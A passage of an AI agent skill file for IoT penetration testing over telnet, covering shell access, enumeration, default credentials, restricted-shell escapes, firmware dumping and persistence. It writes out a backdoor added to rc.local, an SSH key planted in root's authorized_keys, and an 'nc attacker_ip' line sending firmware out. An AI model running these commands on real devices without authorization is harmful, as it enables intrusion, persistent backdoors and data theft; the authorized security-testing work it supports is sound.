Access","type":"text"}]},{"type":"paragraph","content":[{"text":"Establish additional access methods:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Add SSH access (if SSH is available)\nmkdir -p /root/.ssh\necho \"your_ssh_public_key\" >> /root/.ssh/authorized_keys\nchmod 600 /root/.ssh/authorized_keys\nchmod 700 /root/.ssh\n\n# Start SSH service (if not running)\n/etc/init.d/ssh start\n# or\n/etc/init.d/sshd start\n# or\n/etc/init.d/dropbear start # Common on embedded devices\n\n# Add to startup scripts\necho \"/path/to/backdoor &\" >> /etc/rc.local","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. 
Firmware Extraction","type":"text"}]},{"type":"paragraph","content":[{"text":"Extract firmware for offline analysis:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Find MTD partitions (common on embedded devices)\ncat /proc/mtd\ncat /proc/partitions\n\n# Dump flash partitions\ndd if=/dev/mtd0 of=/tmp/bootloader.bin\ndd if=/dev/mtd1 of=/tmp/kernel.bin\ndd if=/dev/mtd2 of=/tmp/rootfs.bin\n\n# Copy to external storage or network\n# If network is available:\nnc attacker_ip 4444 \u003c /tmp/rootfs.bin\n\n# If HTTP server is available:\ncd /tmp\nbusybox httpd -p 8000\n# Then download from http://device_ip:8000/rootfs.bin","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common IoT Device Scenarios","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 1: No Authentication Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Connect - drops directly to root shell\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --interactive\n# Enumerate and exploit","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 2: Custom Port No-Auth Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Many IoT cameras use port 2222\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --interactive","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 3: Password-Protected Shell","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# If you encounter a password prompt, the helper will detect it\n# Try default credentials:\n# - root/root\n# - admin/admin\n# - root/(empty)\n# Search online for device-specific 
defaults","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario 4: Limited Shell Escape","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# If you get a limited shell:\n# Try common escape techniques:\necho $SHELL\n/bin/sh\n/bin/bash\nvi # Then :!/bin/sh\nless /etc/passwd # Then !/bin/sh\nfind / -exec /bin/sh \\;\nawk 'BEGIN {system(\"/bin/sh\")}'","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Testing Checklist","type":"text"}]},{"type":"checkbox_list","attrs":{"id":null},"content":[{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Identify device and firmware version","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for unauthenticated access","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for default/weak credentials","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Enumerate network services and open ports","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for hardcoded credentials in files","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test for command injection vulnerabilities","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check file permissions (SUID, world-writable)","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Check for outdated software with known CVEs","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Test 
for privilege escalation vectors","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Extract firmware for offline analysis","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Document all findings with screenshots/logs","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Best Practices","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Always log your session","type":"text","marks":[{"type":"strong"}]},{"text":": Default logfile is ","type":"text"},{"text":"/tmp/telnet_session.log","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document everything","type":"text","marks":[{"type":"strong"}]},{"text":": Take notes on commands, responses, and findings","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use batch scripts","type":"text","marks":[{"type":"strong"}]},{"text":": Create enumeration scripts for common tasks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Research the device","type":"text","marks":[{"type":"strong"}]},{"text":": Look up known vulnerabilities, default credentials, and common issues","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use proper authorization","type":"text","marks":[{"type":"strong"}]},{"text":": Only perform pentesting on devices you own or have explicit permission to test","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Be careful with destructive commands","type":"text","marks":[{"type":"strong"}]},{"text":": Avoid commands that could brick devices or corrupt 
data","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Monitor your session","type":"text","marks":[{"type":"strong"}]},{"text":": Use ","type":"text"},{"text":"tail -f","type":"text","marks":[{"type":"code_inline"}]},{"text":" in another terminal to watch activity","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Troubleshooting","type":"text"}]},{"type":"paragraph","content":[{"text":"Problem: Connection refused","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Check if telnet service is running, verify port number, check firewall rules","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Connection timeout","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Verify network connectivity, check if device is powered on, verify IP address","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: \"Permission denied\"","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Telnet service may require authentication, try default credentials","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Commands not echoing","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Use ","type":"text"},{"text":"--raw","type":"text","marks":[{"type":"code_inline"}]},{"text":" flag to see unfiltered output","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Problem: Garbled output or wrong prompt 
detection","type":"text","marks":[{"type":"strong"}]}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Solution: Use ","type":"text"},{"text":"--prompt","type":"text","marks":[{"type":"code_inline"}]},{"text":" flag with custom regex pattern for your specific device","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Pre-built Enumeration Scripts","type":"text"}]},{"type":"paragraph","content":[{"text":"The skill includes pre-built enumeration scripts for common tasks:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_system.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": System information gathering","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_network.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": Network configuration enumeration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_files.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": File system exploration","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"enum_security.txt","type":"text","marks":[{"type":"code_inline"}]},{"text":": Security-focused enumeration","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Usage:","type":"text","marks":[{"type":"strong"}]}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"python3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --script .claude/skills/telnetshell/enum_system.txt","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Example Usage","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Basic connection to standard telnet port\npython3 
.claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --command \"uname -a\"\n\n# Connection to custom port (common for IoT cameras)\npython3 .claude/skills/telnetshell/telnet_helper.py --host 192.168.1.100 --port 2222 --command \"ls /\"\n\n# Interactive session with logging\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --logfile /tmp/camera_session.log \\\n --interactive\n\n# Batch enumeration\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --port 2222 \\\n --script enum_system.txt \\\n --json > results.json\n\n# Long-running command with custom timeout\npython3 .claude/skills/telnetshell/telnet_helper.py \\\n --host 192.168.1.100 \\\n --timeout 10 \\\n --command \"find / -name '*.conf'\"","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"References","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Official Site","type":"text","marks":[{"type":"link","attrs":{"href":"https://busybox.net/","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"BusyBox Command List","type":"text","marks":[{"type":"link","attrs":{"href":"https://busybox.net/downloads/BusyBox.html","title":null}}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"IoT pentesting resources and vulnerability databases","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Device-specific documentation and 
datasheets","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"telnetshell","author":"@skillopedia","source":{"stars":767,"repo_name":"iothackbot","origin_url":"https://github.com/brownfinesecurity/iothackbot/blob/HEAD/skills/telnetshell/SKILL.md","repo_owner":"brownfinesecurity","cluster_size":2,"skill_md_path":"skills/telnetshell/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":1},"version":"v1","category":"security","import_tag":"clean-skills-v1","description":"Use telnet to interact with IoT device shells for pentesting operations including device enumeration, vulnerability discovery, credential testing, and post-exploitation. Use when the user needs to interact with network-accessible shells, IoT devices, or telnet services."}},"renderedAt":1782979323481}
